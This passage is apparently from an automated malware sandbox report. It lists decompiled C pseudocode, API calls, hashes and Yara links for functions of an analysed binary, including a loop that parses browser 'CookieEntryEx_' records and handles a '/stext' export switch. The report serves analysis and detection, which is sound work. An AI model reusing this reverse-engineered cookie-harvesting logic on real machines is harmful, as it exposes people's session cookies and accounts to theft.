					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                                                      0x0040562d
                                                                                                                                                      0x0040562e
                                                                                                                                                      0x00405632
                                                                                                                                                      0x0040567d
                                                                                                                                                      0x00405634
                                                                                                                                                      0x00405635
                                                                                                                                                      0x00405637
                                                                                                                                                      0x00405637
                                                                                                                                                      0x0040563b
                                                                                                                                                      0x0040563d
                                                                                                                                                      0x0040563f
                                                                                                                                                      0x00405649
                                                                                                                                                      0x00405651
                                                                                                                                                      0x00405653
                                                                                                                                                      0x00405657
                                                                                                                                                      0x00405661
                                                                                                                                                      0x00405666
                                                                                                                                                      0x0040566a
                                                                                                                                                      0x0040566f
                                                                                                                                                      0x00405679
                                                                                                                                                      0x00405679

                                                                                                                                                      APIs
                                                                                                                                                      • malloc.MSVCRT ref: 00405649
                                                                                                                                                      • memcpy.MSVCRT ref: 00405661
                                                                                                                                                      • free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,74784E00,?,00000000), ref: 0040566A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                      • String ID: _e@
                                                                                                                                                      • API String ID: 3056473165-4143410925
                                                                                                                                                      • Opcode ID: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
                                                                                                                                                      • Instruction ID: 65c1df984c8dd591618957182971b53504cae5b365517194d008c843f4823b23
                                                                                                                                                      • Opcode Fuzzy Hash: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
                                                                                                                                                      • Instruction Fuzzy Hash: 78F0E2B26052229FC718AB76B98184BB3ADEF443247504C3FF408E3281D7399C50CFA8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004061CD, Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                      			E004061CD(FILETIME* __edi, signed int* __esi) {
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				int _t12;

				if(__edi->dwHighDateTime != 0) {
					FileTimeToSystemTime(__edi,  &_v20);
					_t12 = SystemTimeToTzSpecificLocalTime(0,  &_v20,  &_v36); // executed
					_push(__esi);
					if(_t12 == 0) {
						return FileTimeToLocalFileTime(__edi, ??);
					} else {
						SystemTimeToFileTime( &_v36, ??);
						return 1;
					}
				} else {
					 *__esi =  *__esi & 0x00000000;
					__esi[1] = __esi[1] & 0x00000000;
					return 0;
				}
			}






                                                                                                                                                      0x004061d7
                                                                                                                                                      0x004061e9
                                                                                                                                                      0x004061f9
                                                                                                                                                      0x00406201
                                                                                                                                                      0x00406202
                                                                                                                                                      0x0040621b
                                                                                                                                                      0x00406204
                                                                                                                                                      0x00406208
                                                                                                                                                      0x00406212
                                                                                                                                                      0x00406212
                                                                                                                                                      0x004061d9
                                                                                                                                                      0x004061d9
                                                                                                                                                      0x004061dc
                                                                                                                                                      0x004061e3
                                                                                                                                                      0x004061e3

                                                                                                                                                      APIs
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,00401DAD), ref: 004061E9
                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,00401DAD), ref: 004061F9
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00401DAD), ref: 00406208
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 979780441-0
                                                                                                                                                      • Opcode ID: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
                                                                                                                                                      • Instruction ID: ac9071ec82a3ebeda66c59c5f140a76e8f402871b7042997bc81315e07851fa8
                                                                                                                                                      • Opcode Fuzzy Hash: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
                                                                                                                                                      • Instruction Fuzzy Hash: 86F05E729101099BDB209BA0DD49BBBB3FCFB4470AF04443AE502E2080EB74D4088BA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040E490, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                      			E0040E490() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x413270; // 0x2150048
				if(_t1 != 0) {
					_push(_t1); // executed
					L0040E032(); // executed
				}
				_t2 =  *0x413278; // 0x9a7120
				if(_t2 != 0) {
					_push(_t2);
					L0040E032();
				}
				_t3 =  *0x413274; // 0x9a7930
				if(_t3 != 0) {
					_push(_t3);
					L0040E032();
				}
				_t4 =  *0x41327c; // 0x9a7528
				if(_t4 != 0) {
					_push(_t4); // executed
					L0040E032(); // executed
					return _t4;
				}
				return _t4;
			}







                                                                                                                                                      0x0040e490
                                                                                                                                                      0x0040e497
                                                                                                                                                      0x0040e499
                                                                                                                                                      0x0040e49a
                                                                                                                                                      0x0040e49f
                                                                                                                                                      0x0040e4a0
                                                                                                                                                      0x0040e4a7
                                                                                                                                                      0x0040e4a9
                                                                                                                                                      0x0040e4aa
                                                                                                                                                      0x0040e4af
                                                                                                                                                      0x0040e4b0
                                                                                                                                                      0x0040e4b7
                                                                                                                                                      0x0040e4b9
                                                                                                                                                      0x0040e4ba
                                                                                                                                                      0x0040e4bf
                                                                                                                                                      0x0040e4c0
                                                                                                                                                      0x0040e4c7
                                                                                                                                                      0x0040e4c9
                                                                                                                                                      0x0040e4ca
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040e4cf
                                                                                                                                                      0x0040e4d0

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                      • Opcode ID: e004985c1492cb0ade7af50552a73d1fc351eb5532b0270d2b9bcc4f993dbcb7
                                                                                                                                                      • Instruction ID: b52db2e07b3ad488cd6e1e6deac71131c93cc09f27119b6233636937a2a2f9d5
                                                                                                                                                      • Opcode Fuzzy Hash: e004985c1492cb0ade7af50552a73d1fc351eb5532b0270d2b9bcc4f993dbcb7
                                                                                                                                                      • Instruction Fuzzy Hash: 65E01970300211A6DE28AA3BEC41A03238C3A003AA318CC7AF404F72E0CA7CE860882C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040BD40, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E0040BD40(void* __eax, void* __edx, void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				void* __edi;
				void* __esi;
				signed int _t33;
				intOrPtr _t34;
				signed int _t43;
				intOrPtr _t54;
				intOrPtr* _t55;
				void* _t60;
				void* _t61;
				signed int _t65;
				intOrPtr _t66;
				void* _t71;

				_t60 = __edx;
				_t54 = 0;
				_t61 = __eax;
				_v4 = 0;
				E00401EA3( *((intOrPtr*)(__eax + 0x69c)), __eflags, 0, 0);
				 *((intOrPtr*)(_t61 + 0x208)) = 0;
				_t71 = 0;
				_v16 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1 <= 0) {
					L18:
					return _v4;
				} else {
					goto L1;
				}
				do {
					L1:
					_t33 =  *((intOrPtr*)(_t61 + 0x6c0));
					if(_t54 >=  *((intOrPtr*)(_t33 + 0x30))) {
						_t65 = 0x40f454;
					} else {
						_t33 = E00406306(_t33, _t54);
						_t65 = _t33;
					}
					_push(_t65);
					_push(L"/stext");
					L0040E03E();
					_pop(_t57);
					if(_t33 != 0) {
						_t34 = E0040BCAA(_t33, _t65);
						__eflags = _t34;
						if(_t34 <= 0) {
							goto L8;
						}
						goto L7;
					} else {
						_t34 = _t33 + 1;
						L7:
						_v8 = _t34;
						_t10 = _t54 + 1; // 0x2
						_t71 = _t10;
					}
					L8:
					_t54 = _t54 + 1;
				} while (_t54 <  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1);
				_t66 = _v8;
				if(_t66 > 0) {
					E0040B147(_t61, _t57, 0); // executed
					E0040A4C2(_t61);
					_t42 =  *((intOrPtr*)(_t61 + 0x6c0));
					if(_t71 >=  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30))) {
						_t43 = 0x40f454;
					} else {
						_t57 = _t71;
						_t43 = E00406306(_t42, _t71);
					}
					_t79 = _t66 - 8;
					if(_t66 != 8) {
						E004096FE( *((intOrPtr*)(_t61 + 0x69c)), _t60, __eflags, _t43, _t66); // executed
					} else {
						E0040ACA7(_t61, _t57, _t60, _t79, _t43, 0);
					}
					_t55 =  *((intOrPtr*)(_t61 + 0x69c));
					_v4 = 1;
					if(_t55 != 0) {
						 *_t55 = 0x40f648;
						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f6e0;
						E00403F55(_t55 + 0xbf0);
						E0040623E(_t55 + 0xbd0);
						E0040623E(_t55 + 0xbac);
						E00406355(_t55 + 0xb98);
						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f948;
						E00403FBE(_t55 + 0x350);
						E004076F4(_t55);
						_push(_t55);
						L0040E032();
					}
				}
				goto L18;
			}


















                                                                                                                                                      0x0040bd40
                                                                                                                                                      0x0040bd47
                                                                                                                                                      0x0040bd49
                                                                                                                                                      0x0040bd53
                                                                                                                                                      0x0040bd57
                                                                                                                                                      0x0040bd62
                                                                                                                                                      0x0040bd6b
                                                                                                                                                      0x0040bd70
                                                                                                                                                      0x0040bd74
                                                                                                                                                      0x0040be8c
                                                                                                                                                      0x0040be97
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bd7a
                                                                                                                                                      0x0040bd7a
                                                                                                                                                      0x0040bd7a
                                                                                                                                                      0x0040bd83
                                                                                                                                                      0x0040bd90
                                                                                                                                                      0x0040bd85
                                                                                                                                                      0x0040bd87
                                                                                                                                                      0x0040bd8c
                                                                                                                                                      0x0040bd8c
                                                                                                                                                      0x0040bd95
                                                                                                                                                      0x0040bd96
                                                                                                                                                      0x0040bd9b
                                                                                                                                                      0x0040bda3
                                                                                                                                                      0x0040bda4
                                                                                                                                                      0x0040bda9
                                                                                                                                                      0x0040bdae
                                                                                                                                                      0x0040bdb0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bda6
                                                                                                                                                      0x0040bda6
                                                                                                                                                      0x0040bdb2
                                                                                                                                                      0x0040bdb2
                                                                                                                                                      0x0040bdb6
                                                                                                                                                      0x0040bdb6
                                                                                                                                                      0x0040bdb6
                                                                                                                                                      0x0040bdb9
                                                                                                                                                      0x0040bdc2
                                                                                                                                                      0x0040bdc4
                                                                                                                                                      0x0040bdc8
                                                                                                                                                      0x0040bdce
                                                                                                                                                      0x0040bdd8
                                                                                                                                                      0x0040bddf
                                                                                                                                                      0x0040bde4
                                                                                                                                                      0x0040bded
                                                                                                                                                      0x0040bdf8
                                                                                                                                                      0x0040bdef
                                                                                                                                                      0x0040bdef
                                                                                                                                                      0x0040bdf1
                                                                                                                                                      0x0040bdf1
                                                                                                                                                      0x0040bdfd
                                                                                                                                                      0x0040be00
                                                                                                                                                      0x0040be16
                                                                                                                                                      0x0040be02
                                                                                                                                                      0x0040be07
                                                                                                                                                      0x0040be07
                                                                                                                                                      0x0040be1b
                                                                                                                                                      0x0040be23
                                                                                                                                                      0x0040be2b
                                                                                                                                                      0x0040be33
                                                                                                                                                      0x0040be39
                                                                                                                                                      0x0040be43
                                                                                                                                                      0x0040be4e
                                                                                                                                                      0x0040be59
                                                                                                                                                      0x0040be64
                                                                                                                                                      0x0040be6f
                                                                                                                                                      0x0040be79
                                                                                                                                                      0x0040be80
                                                                                                                                                      0x0040be85
                                                                                                                                                      0x0040be86
                                                                                                                                                      0x0040be8b
                                                                                                                                                      0x0040be2b
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040BD9B
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040BE86
                                                                                                                                                        • Part of subcall function 0040BCAA: _wcsicmp.MSVCRT ref: 0040BCB0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp$??3@
                                                                                                                                                      • String ID: /stext
                                                                                                                                                      • API String ID: 3682227554-3817206916
                                                                                                                                                      • Opcode ID: b49fe5e3a00eb3dd06afc28d0350945e3807d706bde39c4344975c329a5855a1
                                                                                                                                                      • Instruction ID: d8bbb9b930e80b6915cfb13594633440f620dbacd53bdbbf48f85004c8b902b2
                                                                                                                                                      • Opcode Fuzzy Hash: b49fe5e3a00eb3dd06afc28d0350945e3807d706bde39c4344975c329a5855a1
                                                                                                                                                      • Instruction Fuzzy Hash: CF31A6316002019BD710FE26D88169AB799FF40358F01057FFC09BB292CB7DA81987ED
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403EAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                      			E00403EAC(void* __ecx, void* __edx, void* __edi) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t9;
				void* _t14;
				void* _t21;
				void* _t22;
				void* _t24;
				WCHAR* _t27;
				signed int _t28;
				signed int _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t29 = _t28 & 0xfffffff8;
				_push(__ecx);
				_push(__ecx);
				_t9 = E004039F6(__edi); // executed
				_t24 = 0;
				_v8 = _t9;
				if(_t9 != 0) {
					L7:
					return _v8;
				}
				if( *((intOrPtr*)(__edi + 0x42c)) <= 0) {
					L5:
					E0040405E(_t22 + 4);
					_t27 = _t22 + 0x430;
					if( *_t27 != 0) {
						DeleteFileW(_t27); // executed
						 *_t27 =  *_t27 & 0x00000000;
					}
					goto L7;
				} else {
					goto L2;
				}
				do {
					L2:
					_t14 = E00403F2B(_t24, _t22 + 0x420);
					_push(0xe);
					_t18 = _t14;
					_push(L"CookieEntryEx_");
					_push(_t14);
					L0040E044();
					_t29 = _t29 + 0xc;
					if(_t14 == 0) {
						E00403BAF(_t21, _t22, _t18); // executed
					}
					_t24 = _t24 + 1;
				} while (_t24 <  *((intOrPtr*)(_t22 + 0x42c)));
				goto L5;
			}













                                                                                                                                                      0x00403eac
                                                                                                                                                      0x00403eac
                                                                                                                                                      0x00403eaf
                                                                                                                                                      0x00403eb2
                                                                                                                                                      0x00403eb3
                                                                                                                                                      0x00403eb8
                                                                                                                                                      0x00403ebd
                                                                                                                                                      0x00403ec1
                                                                                                                                                      0x00403ec5
                                                                                                                                                      0x00403f21
                                                                                                                                                      0x00403f2a
                                                                                                                                                      0x00403f2a
                                                                                                                                                      0x00403ecd
                                                                                                                                                      0x00403f02
                                                                                                                                                      0x00403f05
                                                                                                                                                      0x00403f0a
                                                                                                                                                      0x00403f14
                                                                                                                                                      0x00403f17
                                                                                                                                                      0x00403f1d
                                                                                                                                                      0x00403f1d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403ecf
                                                                                                                                                      0x00403ecf
                                                                                                                                                      0x00403ed7
                                                                                                                                                      0x00403edc
                                                                                                                                                      0x00403ede
                                                                                                                                                      0x00403ee0
                                                                                                                                                      0x00403ee5
                                                                                                                                                      0x00403ee6
                                                                                                                                                      0x00403eeb
                                                                                                                                                      0x00403ef0
                                                                                                                                                      0x00403ef4
                                                                                                                                                      0x00403ef4
                                                                                                                                                      0x00403ef9
                                                                                                                                                      0x00403efa
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004039F6: memset.MSVCRT ref: 00403A36
                                                                                                                                                        • Part of subcall function 004039F6: memset.MSVCRT ref: 00403A50
                                                                                                                                                        • Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A68
                                                                                                                                                        • Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A77
                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00403EE6
                                                                                                                                                        • Part of subcall function 00403BAF: memset.MSVCRT ref: 00403CCA
                                                                                                                                                      • DeleteFileW.KERNELBASE(?), ref: 00403F17
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$wcslen$DeleteFile_wcsnicmp
                                                                                                                                                      • String ID: CookieEntryEx_
                                                                                                                                                      • API String ID: 3258848388-47494461
                                                                                                                                                      • Opcode ID: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
                                                                                                                                                      • Instruction ID: 4f7492928af6ede5aa7db47b88c775c9002a426620b820d7d458ceab620e9f9d
                                                                                                                                                      • Opcode Fuzzy Hash: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
                                                                                                                                                      • Instruction Fuzzy Hash: DF01DBF1A10512AAC2146F25CC426ABF7ACFB04705F00463AF954B31C2E7B86E5187DD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406785, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                      			E00406785() {
				void* _t25;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x413288;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x413288 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41328c = 0x100;
					 *0x413290 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27); // executed
					L0040E038(); // executed
					 *0x413270 = _t27;
					_t28 =  *0x41328c; // 0x100
					_t52 = 4;
					_t29 = _t28 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040E038();
					 *0x413278 = _t29;
					_t30 =  *0x41328c; // 0x100
					_t54 = 4;
					_t31 = _t30 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040E038();
					 *0x41327c = _t31;
					_t32 =  *0x413290; // 0x1000
					_t56 = 2;
					_t33 = _t32 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33); // executed
					L0040E038(); // executed
					 *0x413274 = _t33;
					return _t33;
				}
				return _t25;
			}
















                                                                                                                                                      0x00406785
                                                                                                                                                      0x0040678c
                                                                                                                                                      0x0040679b
                                                                                                                                                      0x0040679c
                                                                                                                                                      0x004067a1
                                                                                                                                                      0x004067a6
                                                                                                                                                      0x004067b0
                                                                                                                                                      0x004067be
                                                                                                                                                      0x004067bf
                                                                                                                                                      0x004067c4
                                                                                                                                                      0x004067c9
                                                                                                                                                      0x004067d2
                                                                                                                                                      0x004067d3
                                                                                                                                                      0x004067dc
                                                                                                                                                      0x004067dd
                                                                                                                                                      0x004067e2
                                                                                                                                                      0x004067e7
                                                                                                                                                      0x004067f0
                                                                                                                                                      0x004067f1
                                                                                                                                                      0x004067fa
                                                                                                                                                      0x004067fb
                                                                                                                                                      0x00406800
                                                                                                                                                      0x00406805
                                                                                                                                                      0x0040680e
                                                                                                                                                      0x0040680f
                                                                                                                                                      0x00406818
                                                                                                                                                      0x00406819
                                                                                                                                                      0x00406821
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406821
                                                                                                                                                      0x00406826

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                      • Opcode ID: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
                                                                                                                                                      • Instruction ID: 453b2fe8fef47dc3e01595af69639ea7307b60866b1d7e5282fab9a2940fa031
                                                                                                                                                      • Opcode Fuzzy Hash: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
                                                                                                                                                      • Instruction Fuzzy Hash: 830121B12422105EEB5CAF39ED0776A66D4A748345F40C5BFF106DE1F4EBB985448B08
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040567E, Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040567E(WCHAR* __edi, WCHAR* _a4) {
				short _v524;
				WCHAR* _t12;

				_t12 = __edi;
				if(GetTempPathW(0x104,  &_v524) == 0) {
					GetWindowsDirectoryW( &_v524, 0x104);
				}
				 *_t12 =  *_t12 & 0x00000000;
				GetTempFileNameW( &_v524, _a4, 0, _t12); // executed
				return _t12;
			}





                                                                                                                                                      0x0040567e
                                                                                                                                                      0x0040569d
                                                                                                                                                      0x004056a7
                                                                                                                                                      0x004056a7
                                                                                                                                                      0x004056ad
                                                                                                                                                      0x004056be
                                                                                                                                                      0x004056c8

                                                                                                                                                      APIs
                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00405695
                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004056A7
                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?), ref: 004056BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1125800050-0
                                                                                                                                                      • Opcode ID: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
                                                                                                                                                      • Instruction ID: c75b1f9f3821b2d5fe4ff9c2abf5100b014bffad6fc652feb2669510f5e075a4
                                                                                                                                                      • Opcode Fuzzy Hash: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
                                                                                                                                                      • Instruction Fuzzy Hash: E9E09276500319EBDB209B50DC0DFC7377CEB84304F000470B945F2151E634AA488BA8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00404070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                      			E00404070(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void* _t15;

				_t17 =  *(__esi[0x106] + 0xec);
				_t11 = _a8 + 1;
				_push(0);
				SetFilePointerEx( *__esi, (_a8 + 1) *  *(__esi[0x106] + 0xec), _t11 * _t17 >> 0x20, 0); // executed
				_t14 = E00405E43(_t15,  *__esi, _a4, _t17); // executed
				return _t14;
			}





                                                                                                                                                      0x00404077
                                                                                                                                                      0x00404081
                                                                                                                                                      0x00404084
                                                                                                                                                      0x0040408c
                                                                                                                                                      0x00404099
                                                                                                                                                      0x004040a2

                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C
                                                                                                                                                        • Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                      • String ID: F@@
                                                                                                                                                      • API String ID: 3154509469-234039029
                                                                                                                                                      • Opcode ID: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
                                                                                                                                                      • Instruction ID: f9449c32f6c0a510c9187a937022f757e046aad29a301ac44eac800f026f52ab
                                                                                                                                                      • Opcode Fuzzy Hash: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
                                                                                                                                                      • Instruction Fuzzy Hash: F2E01776100100FFE6619B09DC05F6BBBB9EBD4710F14C83EB6D5A61B4C6726952CF64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004096FE, Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                                                                                                      Download Yara Rule
